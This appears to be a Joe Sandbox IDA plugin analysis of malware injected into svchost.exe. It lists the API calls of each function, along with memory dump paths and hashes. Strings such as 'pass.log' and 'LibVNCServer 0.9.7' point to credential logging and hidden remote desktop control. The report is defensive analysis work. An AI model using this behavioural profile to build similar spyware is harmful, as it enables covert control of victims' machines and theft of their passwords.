                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 3bdf04e0fc1a37471a1a582fb1dd2ef2ec6d784696ac2a4afa3313b9c2680627
                                                                                                                                                                                                                • Instruction ID: 15ffb24a574b4f000f59072d48a0ef1e114fd0a550c497afd06d6df24d6b41c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bdf04e0fc1a37471a1a582fb1dd2ef2ec6d784696ac2a4afa3313b9c2680627
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F43188B5D4120DAFDB40CFA8E985AEEBBF5FB48310F50856AE914E7300E77499548FA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D269FA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D26A01
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26A15
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D26A2E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D26A3C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3057210225-0
                                                                                                                                                                                                                • Opcode ID: a8f8adb959ef26c3d9a8d93c3e174207ef1e64cdf59e2dbda853e94d4293d7e1
                                                                                                                                                                                                                • Instruction ID: de9ac8587a1a020c07c8f5ef00e2d657b5b2b3d256844658430ca925966b3b2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f8adb959ef26c3d9a8d93c3e174207ef1e64cdf59e2dbda853e94d4293d7e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15110871E4536817E72AD774984D7D93798EB2CB08F4008A9EA45E6381D7B0CED8CAE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000), ref: 02D2D072
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D2D089
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2D09F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D2D0B0
                                                                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02D2D0C7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1270303404-0
                                                                                                                                                                                                                • Opcode ID: 9a5182655af67f4b3b394a6016a977ce0241154e33dabb93fdb00ecea6001b88
                                                                                                                                                                                                                • Instruction ID: 43f2f9459c098921a7f8cbe7bef02fb68363837985f6d42cebfd0eee410c0666
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5182655af67f4b3b394a6016a977ce0241154e33dabb93fdb00ecea6001b88
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0018171945218BBE720DB90AD0DFEE7BA8AB05B05F900184FA41AA2C0D7F45E94CBF1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D3A193,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1BC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1C6
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1CD
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3A1DE
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A22A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 819421891-0
                                                                                                                                                                                                                • Opcode ID: 0bf58b00aae1dd0820cb4a98b357f86347ff057e43127333b18558018a4c93cc
                                                                                                                                                                                                                • Instruction ID: 253199782876a55fab87651db0dda8151bd6672a6ae337aece4f1305a1d7ac66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bf58b00aae1dd0820cb4a98b357f86347ff057e43127333b18558018a4c93cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 320117B1A41B11AFC364CF28F588A06BBF5FF48700B108A19E98A87B40C770F950CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,?,00000000,74DF3080,?,02D28F3C,?,00000006,00000000), ref: 02D2E0EC
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2E103
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2E106
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000006,?,02D28F3C), ref: 02D2E11D
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02D2E122
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3855296974-0
                                                                                                                                                                                                                • Opcode ID: 6054f785341567aa896ac4cc7cde097f0bfb1cddc4686e7f29db95b714cfd391
                                                                                                                                                                                                                • Instruction ID: ebfbc962e12cc7458ac6a46cb386cb54d013e4d0b4295e742d2ffd91baaf5702
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6054f785341567aa896ac4cc7cde097f0bfb1cddc4686e7f29db95b714cfd391
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F08276A403187FD721EB65EC88EABB36CDBD8B60F014915F90097340D6B0ED508BB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2D0EC
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D2D0F4
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D2D100
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000000D,?,?), ref: 02D2D111
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D2D11D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2643679612-0
                                                                                                                                                                                                                • Opcode ID: 466fec6727761a611a8520f8b4c1a500adfccfc7da3ba83e71ed53f2def96fa0
                                                                                                                                                                                                                • Instruction ID: e00320f92f44b7b6e0db406e2edf77d0b2e7c0392527dc4451b2defd2a3ad772
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 466fec6727761a611a8520f8b4c1a500adfccfc7da3ba83e71ed53f2def96fa0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF03032680304BBE7105BA5FC8DFABBB6CEB89B61F404816FA05D7381C6B5AC508670
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2E0AA
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D2E0B2
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02D29CD4,?,?,?,?,02D291A0,?,?), ref: 02D2E0C4
                                                                                                                                                                                                                • GetFocus.USER32 ref: 02D2E0C6
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02D29CD4,?,?,?,?,02D291A0,?,?), ref: 02D2E0D3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 968181190-0
                                                                                                                                                                                                                • Opcode ID: 79d7e886d83226cefb713b6d5a7bbabb1f56940f457b476528aa9bc83108b1bf
                                                                                                                                                                                                                • Instruction ID: 101c37ab7e979acbd755c52800db7b2a9476f2e62ee7f3eb438fd9cb80d5a60f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79d7e886d83226cefb713b6d5a7bbabb1f56940f457b476528aa9bc83108b1bf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDE09231A40204BBD61057A6BC4DF9FBBACDB867A2F500595FA08D3340D675AC1086B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F2D7
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02D3F340
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                                • String ID: 5e8dc163$pass.log
                                                                                                                                                                                                                • API String ID: 1760361154-4085347864
                                                                                                                                                                                                                • Opcode ID: b1b93404e076a38c7c03561b64858aa48eabd7685b5a75d5ac6ab89f58c4bab0
                                                                                                                                                                                                                • Instruction ID: 6fe9cc671693419547d7cd67e5f42c19e6fce5a5bd588d6510c85e5c1e1cab82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1b93404e076a38c7c03561b64858aa48eabd7685b5a75d5ac6ab89f58c4bab0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4311D639904659CFC7168B2CA5786E77FE5AB86300B28C6D5E8C6C7311EA709C48C7D0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46
                                                                                                                                                                                                                • GetWindowInfo.USER32(?,?), ref: 02D2C254
                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000EC,?), ref: 02D2C276
                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D2C289
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$AttributesClassInfoLayeredLongName
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 195909263-4251816714
                                                                                                                                                                                                                • Opcode ID: f5809745f68334f7453456e7bffed2d4dd8a00f152cdfbf7b77567c2f22014c5
                                                                                                                                                                                                                • Instruction ID: ea6988e767385ba96f5e0453924cff3f122e655f23fcf7ee747a34a9dd88e643
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5809745f68334f7453456e7bffed2d4dd8a00f152cdfbf7b77567c2f22014c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF0F430AA41256FD774EAA4E80AF7E376CDF11B48F214529F801E5780EF50DC68CA75
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • free.MSVCRT(00000000,00000000,?,?,00000000,00000000), ref: 02D230EF
                                                                                                                                                                                                                • free.MSVCRT(00000000), ref: 02D23113
                                                                                                                                                                                                                • free.MSVCRT(?), ref: 02D23134
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                • Opcode ID: 9c7e84001997cd86040c08e18f8eaeac6d80fdff2aafe23fe7da32cb90d721a5
                                                                                                                                                                                                                • Instruction ID: ddf93a4f2106be92d7f63918a92526de1e2da83ed77dede21bcab52b4178c40f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c7e84001997cd86040c08e18f8eaeac6d80fdff2aafe23fe7da32cb90d721a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B816C71A0022A9BDF20CF49C584BAEB7B1FFA8318F240598ED05A7380D735DD59CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: mallocrealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 948496778-0
                                                                                                                                                                                                                • Opcode ID: 2acd95ac0e0b4233c71f39beb4a1201124dfc8a34ae8bb4fa353d1920394f446
                                                                                                                                                                                                                • Instruction ID: fb62f2293aea8f87324b184c569d7d5dd30bdfe3289d34d56fb1c2d828ea1eb3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2acd95ac0e0b4233c71f39beb4a1201124dfc8a34ae8bb4fa353d1920394f446
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2891D376E006699FCF04CF24D880AAA3BA6EF84311F0445B9ED099B345D7B4AD55CBB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: mallocrealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 948496778-0
                                                                                                                                                                                                                • Opcode ID: 5fc92da5d976f43fc23f81190bcb7e4d8941991fbcf3f4e4cbc7279d7a710ff5
                                                                                                                                                                                                                • Instruction ID: f4c95fa328d54f244abe4f9c668408f33f581591096055782e201b2b57813e31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fc92da5d976f43fc23f81190bcb7e4d8941991fbcf3f4e4cbc7279d7a710ff5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8791D476E002598FDB04DF24D884AAA3BA6EF54309F0485BAED0D9B345DB74ED15CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                                                                                                • Opcode ID: b1c4b8a6ad51eaf126fbccc65fbd89ba7aa0fd8e7d3e7acaa3ef6759a35f840f
                                                                                                                                                                                                                • Instruction ID: 1b447e26bcd8d57cc8a8936fc448c6420aba5d0e2772d2c04d328280b5418d3b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1c4b8a6ad51eaf126fbccc65fbd89ba7aa0fd8e7d3e7acaa3ef6759a35f840f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951F970100B119BDB25CF24C4946E6B3E6FB99329F74CA19C8BB87354EB71E946CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                                                • String ID: %s (%s)$LibVNCServer 0.9.7$unknown
                                                                                                                                                                                                                • API String ID: 2111968516-696653274
                                                                                                                                                                                                                • Opcode ID: 074e29d3229b2c864c3feee7dbb909c66dedd3421ef52d251c84c2532f0aaa15
                                                                                                                                                                                                                • Instruction ID: ed58fcff45ed86856fcb2d3eeef7d69eb9d38605bcf84d72afe50b026e3ddc0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 074e29d3229b2c864c3feee7dbb909c66dedd3421ef52d251c84c2532f0aaa15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41A731A0425A8FDB05DF28C9A8BE677A6EF45305F0481F5DD4D9F306DB74A90ACBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D27B43
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,74DEF380), ref: 02D27B73
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocCloseProcessmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2501364573-0
                                                                                                                                                                                                                • Opcode ID: e752db339a10adafc5bdbad11974da013f4c261ed8ae0d1a9a38d9836c502ebc
                                                                                                                                                                                                                • Instruction ID: d1a4a98163ee9f37bb26840b024d8437f7715757fe5cda33fecb9cda690a7f50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e752db339a10adafc5bdbad11974da013f4c261ed8ae0d1a9a38d9836c502ebc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E213E329040795FEB359A74DC9CBEAF79AEB69308F1409B8D685C7340D2308D88C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32082
                                                                                                                                                                                                                • GetParent.USER32(?), ref: 02D3208E
                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000104), ref: 02D320A5
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D320C6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ParentTextWindowmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4175915554-0
                                                                                                                                                                                                                • Opcode ID: c9d3c0003f22ba11de256463a12fd0bffc1938ee76e19661b512cc7136d6af20
                                                                                                                                                                                                                • Instruction ID: 1523af6291c17d11a763843a0b36d725b5e0f1c175bbe250820e2fdc9eb8a60c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d3c0003f22ba11de256463a12fd0bffc1938ee76e19661b512cc7136d6af20
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D01C073F4021427D7209A69ECCCEABF36DAB44654F54427AFE18E3300EA70DD98C6A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?,?,00000000,?,?,02D38FB5,?), ref: 02D389F3
                                                                                                                                                                                                                  • Part of subcall function 02D33D20: GetProcessHeap.KERNEL32(00000008,?,?,?,02D38A05,?,?,02D38FB5,?), ref: 02D33D31
                                                                                                                                                                                                                  • Part of subcall function 02D33D20: HeapAlloc.KERNEL32(00000000,?,?,02D38FB5,?), ref: 02D33D38
                                                                                                                                                                                                                  • Part of subcall function 02D33D20: memset.MSVCRT ref: 02D33D48
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D38A0E
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DA1
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DB4
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DC7
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DDA
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DED
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E00
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E13
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E26
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E39
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E4C
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E5F
                                                                                                                                                                                                                  • Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E72
                                                                                                                                                                                                                  • Part of subcall function 02D3DCA0: memset.MSVCRT ref: 02D3DCC1
                                                                                                                                                                                                                  • Part of subcall function 02D3DCA0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02D3DCF9
                                                                                                                                                                                                                  • Part of subcall function 02D3DCA0: PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3DD2D
